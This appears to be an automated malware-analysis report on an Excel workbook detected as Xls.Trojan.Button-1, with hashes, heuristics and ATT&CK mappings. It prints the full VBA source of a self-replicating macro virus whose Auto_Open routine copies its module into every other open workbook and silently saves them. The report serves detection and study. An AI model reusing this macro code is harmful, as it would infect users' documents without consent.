Xls.Trojan.Button-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 022eb2e88be99e12…

MALICIOUS

Office (OLE)

Size: 44.5 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: f2a02b3ba61182adaa2e086864b4aeeb
SHA-1: b6e618e198165e3ffed668b50e48b5389d28475f
SHA-256: 022eb2e88be99e12f830668921f0a09871bd408545d7e680ccfd77f7296e6fd4
Risk score: 300

Malware Insights

Xls.Trojan.Button-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is an Excel workbook with a high-confidence detection for VBA macros, specifically an Auto_Open macro, a common technique for executing code as soon as the document is opened. ClamAV identifies it as 'Xls.Trojan.Button-1'. The presence of an Auto_Open macro indicates an attempt to run a payload immediately, likely for further system compromise. The extracted macro source (below) shows what that payload does: on open it exports its own "cmdButton" module to disk, imports it into every other open workbook that does not already contain it, saves those workbooks with alerts suppressed, and adds a toolbar button to the worksheet menu bar, i.e. the sample behaves as a self-replicating macro virus.

Heuristics (6)

  • CLAMAV_DETECTION (critical): ClamAV: Xls.Trojan.Button-1
    ClamAV detected this file as malware: Xls.Trojan.Button-1
  • EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE (critical): Embedded Office document has suspicious static findings
    A CFB/OLE Office document was found inside another file type, and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of the Office scanner.
  • OLE_SLACK_ANOMALY (high): OLE document has a large unaccounted-for region
    The OLE file is 20,824 bytes but its declared streams total only 0 bytes, so all 20,824 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE_VBA_MACROS (medium, 1 related finding): VBA macros detected
    The document contains VBA macro code.
  • OLE_VBA_AUTO (high): Auto_Open macro
    The VBA project defines an Auto_Open procedure, which Excel runs automatically when the workbook is opened.
  • OLE_PARSE_EMPTY_STREAMS (medium): CFB header with no readable streams
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous: it is seen with truncated or corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3634 bytes
SHA-256: 4932f26955a9df5616c808e7c50ea325248f17371d1d8366756a61245d69be60
Detection: ClamAV: Xls.Trojan.Button-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "cmdButton"
Option Explicit


Private Sub RunChild()
    Dim cbar As CommandBar
    Dim cbarTool As CommandBarControl
    
    On Error Resume Next
    
        Set cbar = Application.CommandBars("Worksheet Menu Bar")
        If cbar.Controls(1).Tag <> "Happy" Then
            Set cbarTool = cbar.Controls.Add(msoControlButton, , , 1)
            With cbarTool
                .FaceId = 59
                .Tag = "Happy"
                .OnAction = ""
                .TooltipText = "Don't press this button"
                .Style = msoButtonIcon
            End With
        End If
End Sub

Private Sub Auto_Open()
    Reproduce
    RunChild
End Sub


Private Sub Reproduce()
    Dim wb As Workbook
    Dim wbAct As Workbook
    Dim i As Integer, boolAdd As Boolean
    
    On Error Resume Next
    Set wbAct = activeworkbook
    wbAct.VBProject.VBComponents.Item("cmdbutton").Export "C:\cmdbutton.bas"
    
    Application.DisplayAlerts = False
    For Each wb In Workbooks
        boolAdd = True
        If wb.Name <> wbAct.Name Then
            wb.VBProject.References.AddFromFile ("C:\Program Files\Common Files\Microsoft Shared\VBA\VBEext1.olb")
            
            For i = 1 To wb.VBProject.VBComponents.count
                If wb.VBProject.VBComponents(i).Name = "cmdButton" Then
                    boolAdd = False
                    Exit For
                End If
            Next i
            
            If boolAdd = True Then
                wb.VBProject.VBComponents.Import "C:\cmdbutton.bas"
            End If
        End If
        Application.ScreenUpdating = False
        wb.SAVE
        Application.ScreenUpdating = True
    Next wb
    Application.DisplayAlerts = True
End Sub

Filename: embedded_office_off000060a8.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside the OLE container at offset 0x60A8
Size: 20824 bytes
SHA-256: 14d4b7609160a0f89b6af5d99c0b904d81820bfe82e247b5fd74adee885bacf2